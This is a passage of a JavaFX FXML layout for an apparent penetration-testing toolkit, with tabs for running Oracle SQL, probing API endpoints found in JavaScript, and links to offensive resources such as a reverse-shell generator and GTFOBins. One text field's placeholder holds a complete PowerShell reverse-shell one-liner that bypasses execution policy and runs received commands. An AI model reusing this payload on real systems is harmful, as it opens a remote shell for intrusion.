<ComboBox fx:id="OracleComboBoxTable" disable="true" onAction="#OracleComboBoxTable" prefHeight="29.0" prefWidth="138.0" promptText="请选择数据表">
|
||
<HBox.margin>
|
||
<Insets left="20.0" top="5.0" />
|
||
</HBox.margin>
|
||
</ComboBox>
|
||
</children>
|
||
</HBox>
|
||
<HBox prefHeight="41.0" prefWidth="990.0">
|
||
<children>
|
||
<Label text="命 令 ">
|
||
<HBox.margin>
|
||
<Insets left="10.0" top="10.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<TextField fx:id="OracleSQLTextField" prefHeight="29.0" prefWidth="724.0" promptText="select * from users 注意,最后不要分号">
|
||
<HBox.margin>
|
||
<Insets left="10.0" top="5.0" />
|
||
</HBox.margin>
|
||
</TextField>
|
||
<Button fx:id="OracleEXECBtn" mnemonicParsing="false" onAction="#OracleEXECBtn" prefHeight="29.0" prefWidth="172.0" text="执行">
|
||
<HBox.margin>
|
||
<Insets left="20.0" top="5.0" />
|
||
</HBox.margin>
|
||
</Button>
|
||
</children>
|
||
</HBox>
|
||
<HBox prefHeight="541.0" prefWidth="990.0">
|
||
<children>
|
||
<TextArea fx:id="OracleTextArea" prefHeight="537.0" prefWidth="986.0" />
|
||
</children>
|
||
</HBox>
|
||
</children>
|
||
</VBox>
|
||
</children>
|
||
<padding>
|
||
<Insets top="10.0" />
|
||
</padding>
|
||
</HBox>
|
||
</children>
|
||
</VBox>
|
||
</content>
|
||
</Tab>
|
||
</tabs>
|
||
<padding>
|
||
<Insets bottom="5.0" />
|
||
</padding>
|
||
<opaqueInsets>
|
||
<Insets />
|
||
</opaqueInsets>
|
||
<cursor>
|
||
<Cursor fx:constant="DEFAULT" />
|
||
</cursor>
|
||
<effect>
|
||
<Bloom threshold="1.0" />
|
||
</effect>
|
||
</TabPane>
|
||
</children>
|
||
<padding>
|
||
<Insets top="10.0" />
|
||
</padding>
|
||
</HBox>
|
||
</children>
|
||
</VBox>
|
||
</content>
|
||
</Tab>
|
||
<Tab closable="false" text="JS接口">
|
||
<content>
|
||
<VBox prefHeight="461.0" prefWidth="990.0">
|
||
<children>
|
||
<HBox>
|
||
<children>
|
||
<Label fx:id="proxyStatusLabel1111" contentDisplay="BOTTOM" prefHeight="22.0" prefWidth="62.0" text=" URL" textFill="#1cad5b">
|
||
<font>
|
||
<Font size="14.0" />
|
||
</font>
|
||
<HBox.margin>
|
||
<Insets left="80.0" top="3.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<TextField fx:id="jsURLTextField" prefHeight="29.0" prefWidth="467.0" promptText="请填写js地址(js不要有?参数)或者url地址" />
|
||
<Button fx:id="jsGetInterFaceBtn" mnemonicParsing="false" onAction="#jsGetInterFaceBtn" text="获取">
|
||
<HBox.margin>
|
||
<Insets left="50.0" />
|
||
</HBox.margin>
|
||
<textFill>
|
||
<LinearGradient endX="1.0" endY="1.0" startX="0.5603864734299517" startY="0.13526570048309178">
|
||
<stops>
|
||
<Stop color="#0cb072" />
|
||
<Stop color="WHITE" offset="1.0" />
|
||
</stops>
|
||
</LinearGradient>
|
||
</textFill>
|
||
</Button>
|
||
</children>
|
||
<VBox.margin>
|
||
<Insets top="10.0" />
|
||
</VBox.margin>
|
||
</HBox>
|
||
<HBox>
|
||
<children>
|
||
<TextArea fx:id="jsInterFaceTextArea" prefHeight="646.0" prefWidth="491.0" />
|
||
<BorderPane prefHeight="612.0" prefWidth="327.0">
|
||
<center>
|
||
<VBox prefHeight="646.0" prefWidth="219.0">
|
||
<children>
|
||
<TextField fx:id="jsCTXTextField" prefHeight="29.0" prefWidth="467.0" promptText="/ctx">
|
||
<VBox.margin>
|
||
<Insets top="40.0" />
|
||
</VBox.margin>
|
||
</TextField>
|
||
<Button fx:id="jsAddCTXBtn" mnemonicParsing="false" onAction="#jsAddCTXBtn" prefHeight="29.0" prefWidth="149.0" text="添加ctx">
|
||
<VBox.margin>
|
||
<Insets left="5.0" top="10.0" />
|
||
</VBox.margin>
|
||
</Button>
|
||
<Label fx:id="proxyStatusLabel11111" contentDisplay="BOTTOM" prefHeight="22.0" prefWidth="109.0" text=" 请求方式" textFill="#1cad5b">
|
||
<font>
|
||
<Font size="14.0" />
|
||
</font>
|
||
<VBox.margin>
|
||
<Insets left="25.0" top="50.0" />
|
||
</VBox.margin>
|
||
</Label>
|
||
<HBox>
|
||
<children>
|
||
<RadioButton fx:id="getRadioBtn" mnemonicParsing="false" onAction="#ChoiceJSReqMethodType" text="GET">
|
||
<textFill>
|
||
<LinearGradient endX="1.0" endY="1.0" startX="0.7342995169082126" startY="0.8309178743961353">
|
||
<stops>
|
||
<Stop color="#b53f00" />
|
||
<Stop color="WHITE" offset="1.0" />
|
||
</stops>
|
||
</LinearGradient>
|
||
</textFill>
|
||
<HBox.margin>
|
||
<Insets left="20.0" />
|
||
</HBox.margin>
|
||
<toggleGroup>
|
||
<ToggleGroup fx:id="jsReqType" />
|
||
</toggleGroup>
|
||
</RadioButton>
|
||
<RadioButton fx:id="postRadioBtn" mnemonicParsing="false" onAction="#ChoiceJSReqMethodType" text="POST" toggleGroup="$jsReqType">
|
||
<textFill>
|
||
<LinearGradient endX="1.0" endY="1.0" startX="0.7342995169082126" startY="0.8309178743961353">
|
||
<stops>
|
||
<Stop color="#b53f00" />
|
||
<Stop color="WHITE" offset="1.0" />
|
||
</stops>
|
||
</LinearGradient>
|
||
</textFill>
|
||
<HBox.margin>
|
||
<Insets left="5.0" />
|
||
</HBox.margin>
|
||
</RadioButton>
|
||
</children>
|
||
</HBox>
|
||
<Button fx:id="jsGetStatusBtn" mnemonicParsing="false" onAction="#jsGetStatusBtn" prefHeight="29.0" prefWidth="149.0" text="获取接口状态">
|
||
<VBox.margin>
|
||
<Insets left="5.0" top="5.0" />
|
||
</VBox.margin>
|
||
</Button>
|
||
<TextArea accessibleRole="IMAGE_VIEW" cacheShape="false" centerShape="false" editable="false" focusTraversable="false" opacity="0.91" prefHeight="200.0" prefWidth="200.0" scaleShape="false" style="-fx-text-fill: red; -fx-background-color: #dcdcdc;" text="使用说明 1、输入网址获取js地址 2、输入js地址获取接口 3、选择请求方式 4、直接获取接口状态" wrapText="true">
|
||
<VBox.margin>
|
||
<Insets top="50.0" />
|
||
</VBox.margin>
|
||
</TextArea>
|
||
</children>
|
||
</VBox>
|
||
</center>
|
||
<HBox.margin>
|
||
<Insets />
|
||
</HBox.margin>
|
||
</BorderPane>
|
||
<TextArea fx:id="jsResultTextArea" prefHeight="646.0" prefWidth="651.0" />
|
||
</children>
|
||
<VBox.margin>
|
||
<Insets top="5.0" />
|
||
</VBox.margin>
|
||
</HBox>
|
||
</children>
|
||
</VBox>
|
||
</content>
|
||
</Tab>
|
||
<Tab closable="false" text="辅助网站">
|
||
<content>
|
||
<VBox>
|
||
<children>
|
||
<ScrollPane maxHeight="1.7976931348623157E308" maxWidth="1.7976931348623157E308">
|
||
<content>
|
||
<VBox prefHeight="672.0" prefWidth="990.0">
|
||
<children>
|
||
<TitledPane maxHeight="1.7976931348623157E308" maxWidth="1.7976931348623157E308" text="反弹shell生成 - https://www.revshells.com/" textFill="#c22138">
|
||
<content>
|
||
<HBox>
|
||
<children>
|
||
<TextArea fx:id="acTextArea61" maxHeight="1.7976931348623157E308" maxWidth="1.7976931348623157E308" prefHeight="49.0" prefWidth="1314.0" text="https://www.revshells.com/">
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
</children>
|
||
</HBox>
|
||
</content>
|
||
</TitledPane>
|
||
<TitledPane text="HackTricks - https://book.hacktricks.xyz">
|
||
<content>
|
||
<HBox maxHeight="-Infinity" maxWidth="-Infinity" minHeight="-Infinity" minWidth="-Infinity">
|
||
<children>
|
||
<TextArea fx:id="acTextArea21" prefHeight="0.0" prefWidth="966.0" text="https://book.hacktricks.xyz/">
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
</children>
|
||
<opaqueInsets>
|
||
<Insets />
|
||
</opaqueInsets>
|
||
</HBox>
|
||
</content>
|
||
<textFill>
|
||
<LinearGradient endX="1.0" endY="0.9806763285024155" startX="0.9420289855072463" startY="0.27053140096618356">
|
||
<stops>
|
||
<Stop color="#b90808" />
|
||
<Stop color="WHITE" offset="1.0" />
|
||
</stops>
|
||
</LinearGradient>
|
||
</textFill>
|
||
</TitledPane>
|
||
<TitledPane text="WADComs 域命令手册 - https://wadcoms.github.io/" textFill="#d12e1b">
|
||
<content>
|
||
<HBox>
|
||
<children>
|
||
<TextArea fx:id="acTextArea31" prefHeight="0.0" prefWidth="966.0" text="https://wadcoms.github.io/">
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
</children>
|
||
</HBox>
|
||
</content>
|
||
</TitledPane>
|
||
<TitledPane text="GTFOBins Linux提权 - https://gtfobins.github.io/" textFill="#d71d1d">
|
||
<content>
|
||
<HBox>
|
||
<children>
|
||
<TextArea fx:id="acTextArea41" prefHeight="0.0" prefWidth="966.0" promptText="powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("127.0.0.1",8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" text="GTFOBins Linux提权 - https://gtfobins.github.io/">
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
</children>
|
||
</HBox>
|
||
</content>
|
||
</TitledPane>
|
||
<TitledPane text="LOLBAS exe手册 - https://lolbas-project.github.io/" textFill="#dd1111">
|
||
<content>
|
||
<HBox>
|
||
<children>
|
||
<TextArea fx:id="acTextArea51" prefHeight="0.0" prefWidth="966.0" text="https://lolbas-project.github.io/">
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
</children>
|
||
</HBox>
|
||
</content>
|
||
</TitledPane>
|
||
</children>
|
||
</VBox>
|
||
</content>
|
||
<VBox.margin>
|
||
<Insets top="5.0" />
|
||
</VBox.margin>
|
||
</ScrollPane>
|
||
</children>
|
||
</VBox>
|
||
</content>
|
||
</Tab>
|
||
</tabs>
|
||
<padding>
|
||
<Insets bottom="5.0" />
|
||
</padding>
|
||
<VBox.margin>
|
||
<Insets top="5.0" />
|
||
</VBox.margin>
|
||
<opaqueInsets>
|
||
<Insets />
|
||
</opaqueInsets>
|
||
<cursor>
|
||
<Cursor fx:constant="DEFAULT" />
|
||
</cursor>
|
||
<effect>
|
||
<Bloom threshold="1.0" />
|
||
</effect>
|
||
</TabPane>
|
||
<HBox alignment="BOTTOM_CENTER" prefWidth="990.0" VBox.vgrow="ALWAYS">
|
||
<children>
|
||
<Label fx:id="proxyStatusLabel1" contentDisplay="BOTTOM" prefHeight="20.0" prefWidth="1200.0" text="By 0x7eTeam 421" textFill="#dddddd">
|
||
<padding>
|
||
<Insets left="3.0" top="3.0" />
|
||
</padding>
|
||
<font>
|
||
<Font size="14.0" />
|
||
</font>
|
||
</Label>
|
||
</children>
|
||
<VBox.margin>
|
||
<Insets bottom="1.0" right="1.0" />
|
||
</VBox.margin>
|
||
<padding>
|
||
<Insets bottom="1.0" />
|
||
</padding>
|
||
</HBox>
|
||
</children>
|
||
<padding>
|
||
<Insets bottom="5.0" left="5.0" right="5.0" top="5.0" />
|
||
</padding>
|
||
</VBox>
|